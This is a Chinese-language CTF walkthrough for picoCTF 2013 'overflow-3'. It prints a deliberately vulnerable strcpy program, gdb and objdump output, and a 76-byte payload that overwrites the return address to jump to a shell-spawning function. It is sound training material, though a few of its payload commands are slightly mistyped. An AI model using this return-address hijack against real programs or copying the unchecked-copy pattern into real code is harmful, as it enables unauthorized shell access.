pico-ctf-2013 overflow-3

栈溢出入门教程三

overflow3.c

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "dump_stack.h"

/*
 * Goal: Get the program to run this function.
 */
void shell(void) {
    execl("/bin/sh", "sh", NULL);
}

void vuln(char *str) {
    char buf[64];
    strcpy(buf, str);
    dump_stack((void **) buf, 21, (void **) &str);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: buffer_overflow [str]\n");
        return 1;
    }
    uid_t euid = geteuid();
    setresuid(euid, euid, euid);
    printf("shell function = %p\n", shell);
    vuln(argv[1]);
    return 0;
}

checksec的结果：

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial

几乎没有什么保护，脆弱的程序啊．
思路:由上面的c代码可见，如果我们能够执行shell函数，我们就能拿到shell.但是没有条件跳转过去．但是我们有溢出这个漏洞可以利用，劫持eip,使其跳转到shell函数．
１．找出返回值地址．

./overflow3 $(python -c "print 'A'*64+'B'*4")
shell function = 0x80485f8
Stack dump:
0xffffced0: 0xffffd196 (first argument)
0xffffcecc: 0x080486bc (saved eip)
0xffffcec8: 0xffffcef8 (saved ebp)
0xffffcec4: 0xf7ffd900
0xffffcec0: 0x42424242
0xffffcebc: 0x41414141
0xffffceb8: 0x41414141
0xffffceb4: 0x41414141
0xffffceb0: 0x41414141
0xffffceac: 0x41414141
0xffffcea8: 0x41414141
0xffffcea4: 0x41414141
0xffffcea0: 0x41414141
0xffffce9c: 0x41414141
0xffffce98: 0x41414141
0xffffce94: 0x41414141
0xffffce90: 0x41414141
0xffffce8c: 0x41414141
0xffffce88: 0x41414141
0xffffce84: 0x41414141
0xffffce80: 0x41414141 (beginning of buffer)

上面结果给出了：eip的地址是0xffffcecc，与beginning of buffer(0xffffce80)相差76，接下来需要获取shell函数的地址．

objdump -d overflow3|grep ">:"
0804837c <_init>:
080483b0 <setresuid@plt-0x10>:
080483c0 <setresuid@plt>:
080483d0 <printf@plt>:
080483e0 <geteuid@plt>:
080483f0 <strcpy@plt>:
08048400 <puts@plt>:
08048410 <__gmon_start__@plt>:
08048420 <__libc_start_main@plt>:
08048430 <putchar@plt>:
08048440 <execl@plt>:
08048450 <_start>:
08048480 <__do_global_dtors_aux>:
080484e0 <frame_dummy>:
08048504 <dump_stack>:
080485f8 <shell>:
0804861c <vuln>:
08048650 <main>:
080486d0 <__libc_csu_init>:
08048740 <__libc_csu_fini>:
08048742 <__i686.get_pc_thunk.bx>:
08048750 <__do_global_ctors_aux>:
0804877c <_fini>:

shell地址：0x080485f8.于是构造下面payload：./overflow3 $(python -c “print ‘A’*76+’\xf8\x85\x04\x08’”).
结果图：
方法二：对于这类需要劫持控制流，上面这种属于特殊情况．因为它执行了了dump_stack函数，将相关的堆栈信息输出了．对于那些没有将栈信息输出的程序，我们可以通过gdb调试来计算出返回值地址和buffer start之间的距离，然后再覆盖其返回值地址，劫持控制流．

gdb --args ./overflow3 $(python -c "print 'A'*64+'B'*4")

vuln函数汇编代码：

0x0804861c <+0>:    push   ebp
0x0804861d <+1>:    mov    ebp,esp
0x0804861f <+3>:    sub    esp,0x58
0x08048622 <+6>:    mov    eax,DWORD PTR [ebp+0x8]
0x08048625 <+9>:    mov    DWORD PTR [esp+0x4],eax
0x08048629 <+13>:   lea    eax,[ebp-0x48]
0x0804862c <+16>:   mov    DWORD PTR [esp],eax
0x0804862f <+19>:   call   0x80483f0 <strcpy@plt>
0x08048634 <+24>:   lea    eax,[ebp+0x8]
0x08048637 <+27>:   mov    DWORD PTR [esp+0x8],eax
0x0804863b <+31>:   mov    DWORD PTR [esp+0x4],0x15
0x08048643 <+39>:   lea    eax,[ebp-0x48]
0x08048646 <+42>:   mov    DWORD PTR [esp],eax
0x08048649 <+45>:   call   0x8048504 <dump_stack>
0x0804864e <+50>:   leave  
0x0804864f <+51>:   ret  

我们在0x0804861d和0x0804864e分别下断点．

b * 0x0804861d
b * 0x0804864e

0x0804861d处的栈空间内容：
gdb-peda$ x/32x $esp-0x50
0xffffce18: 0x000000e0  0x00000000  0xf7ffd000  0x0804827c
0xffffce28: 0x34303840  0x38663538  0xffffce98  0xf7e05798
0xffffce38: 0xf7e40bcb  0x00000000  0xf7faf000  0xf7faf000
0xffffce48: 0xffffce98  0xf7e48046  0xf7fafd60  0x08048839
0xffffce58: 0xffffce78  0xf7e48020  0x08048839  0xf7ffd918
0xffffce68: 0xffffce98  0x080486bc  0xffffd165  0x080485f8
0xffffce78: 0x000003e8  0xf7e2d9eb  0xf7faf3dc  0x0804823c
0xffffce88: 0x080486d9  0x000003e8  0xf7faf000  0xf7faf000

断点：0x0804864e的栈信息

gdb-peda$ x/30x 0xffffce70-0x50
0xffffce20: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffce30: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffce40: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffce50: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffce60: 0x42424242  0xf7ffd900  0xffffce98  0x080486bc
0xffffce70: 0xffffd165  0x080485f8  0x000003e8  0xf7e2d9eb

由于vuln函数的返回地址是0x080486bc，由此我们可以计算出返回地址距buffer start的距离．

0xffffce6c-0xffffce20=0x4c=76

运行：

./overflow $(python -c "A"*76+'\xf8\x85\x04\x08')

获得一个新的shell.
其实本题我们也可以通过shellcode，来获取一个新的shell.
这个方法在下面的文章你会看到的．
注：由于操作系统的原因，函数的地址可能会有不同，在此一定要以你的电脑上的地址为准．附带相关文件地址：文件地址